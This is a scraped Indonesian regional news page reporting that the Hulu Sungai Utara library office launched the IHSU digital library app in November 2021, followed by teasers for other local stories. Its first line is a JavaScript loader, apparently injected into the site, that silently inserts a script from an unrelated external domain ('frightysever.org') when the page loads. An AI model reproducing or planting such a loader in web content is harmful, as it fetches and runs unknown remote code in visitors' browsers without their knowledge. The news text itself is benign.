(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
Kabupaten Hulu Sungai Utara

Layanan Perpustakaan Buku Digital, Dispersip HSU Luncurkan Aplikasi IHSU


KANALKALIMANTAN.COM, AMUNTAI – Guna mempermudah masyarakat mengakses buku bacaan dimanapun berada, Dinas Perpustakaan dan Kearsipan (Dispersip) Kabupaten Hulu Sungai Utara (HSU) resmi meluncurkan inovasi perpustakaan berbasis digital yakni aplikasi IHSU.

“Mudah-mudahan dengan adanya aplikasi IHSU ini memberikan manfaat yang besar bagi masyarakat Hulu Sungai Utara dalam meningkatkan wawasan, pengetahuan dan kecerdasan,” kata Plt Bupati HSU Husairi Abdi, di aula Dispersip HSU, Senin (22/11/2021) siang.

Husairi menyebut bahwa keberadaan sebuah perpustakaan sering diibaratkan sebagai jantung informasi dan transfer pengetahuan ke seluruh lapisan masyarakat, guna peningkatan sumber daya manusia yang bersaing tinggi di tengah era modern.

“Sejarah bagi kami Hulu Sungai Utara dapat menyediakan konten buku-buku digital bagi seluruh lapisan masyarakat dalam memberikan informasi dan ilmu pengetahuan melalui perpustakaan digital melalui aplikasi IHSU,” ujar Husairi.

 

Baca juga : Taekwondoin HSU Boyong 10 Medali dari Kejurnas “Indonesia Youth Virtual Championship 2021”

Adanya aplikasi digital IHSU ini diharapkan mempermudah masyarakat mengakses buku bacaan dimanapun berada.

Pengembangan perpustakaan digital ini tidak lain sebagai bentuk peran pemerintah daerah dalam mengembangkan dunia literasi dan meningkatkan budaya gemar membaca di Hulu Sungai Utara.

“Sehingga nantinya berdampak pada meningkatnya indeks pembangunan literasi masyarakat di HSU,” imbuhnya.

Kepala Dinas Perpustakaan dan Kearsipan (Dispersip) HSU, Hj Lailatanur Raudhah menuturkan seiring dengan perkembangan teknologi dan informasi, literasi berbasis digital semakin dibutuhkan khususnya di kalangan kaum milenial.

 

Baca juga : Aksi Donor Darah Polairud Polresta Banjarmasin 

“Perpustakaan sekarang bukan hanya saja kumpulan tempat buku tercetak, akan tetapi perpustakaan dituntut mengikuti perkembangan zaman dalam menyediakan seluruh informasi berbasis digital,” katanya.

Berdasarkan Undang-Undang Nomor 43 Tahun 2007 tentang perpustakaan bab V pasal 14 bahwa setiap perpustakaan mengembangkan layanan perpustakaan sesuai dengan kemajuan teknologi dan informasi.

Ia menilai adanya perpustakaan berbasis digital ini, diharapkan bisa mendorong peningkatan minat baca masyarakat dan mempermudah mengakses buku-buku yang tersedia.

“Aanya perpustakaan digital IHSU ini, bukan berarti perpustakaan semakin sepi karena sudah bisa baca dimanapun, karena perpustakaan sekarang sudah bertransformasi,” pungkasnya. (kanalkalimantan.com/dew)

Reporter : dew
Editor : bie


Desy Arfianty

Recent Posts

Dilakban di Paha, Empat Orang di Bandara Juwata Tarakan Selundupkan 4 Kg Sabu

KANALKALIMANTAN.COM, TARAKAN - Empat orang calon penumpang pesawat dengan rute Tarakan-Makassar batal berangkat lantaran kedapatan… Read More

2 jam ago

Satgas TMMD Bikin Sumur Bor untuk Warga Desa Sungai Karias

KANALKALIMANTAN.COM, AMUNTAI - Pengerjaan sumur bor menjadi salah satu sasaran fisik program TNI Manunggal Membangun… Read More

3 jam ago

Jemaah Termuda Kloter 1 Daftar Haji saat Umur 10 Tahun, Setor 2014 Berangkat 2024

KANALKALIMANTAN.COM, BANJARBARU - Berangkat haji ke Baitullah menunaikan Rukun Islam kelima sepenuhnya adalah panggilan. Berusia… Read More

6 jam ago

Embarkasi Banjarmasin Berangkatkan 5.759 JCH Kalsel-Kalteng, Pelayanan Penuh Jemaah Lansia

KANALKALIMANTAN.COM, BANJARBARU - Sebanyak 4.071 jemaah calon haji (JCH) asal Kalimantan Selatan (Kalsel) akan berangkat… Read More

7 jam ago

Caleg Terpilih Tak Harus Mundur Jika Maju Pilkada, Begini Penjelasan Ketua KPU Kalsel

KANALKALIMANTAN.COM, BANJARMASIN - Caleg Anggota Dewan Perwakilan Rakyat (DPR), Anggota Dewan Perwakilan Rakyat Daerah (DPRD)… Read More

8 jam ago

Lepas Keberangkatan 320 Calon Haji, Ini Pesan Bupati Banjar

KANALKALIMANTAN.COM, MARTAPURA - Bagian dalam dan luar halaman Mahligai Sultan Adam di Jalan A Yani… Read More

10 jam ago

This website uses cookies.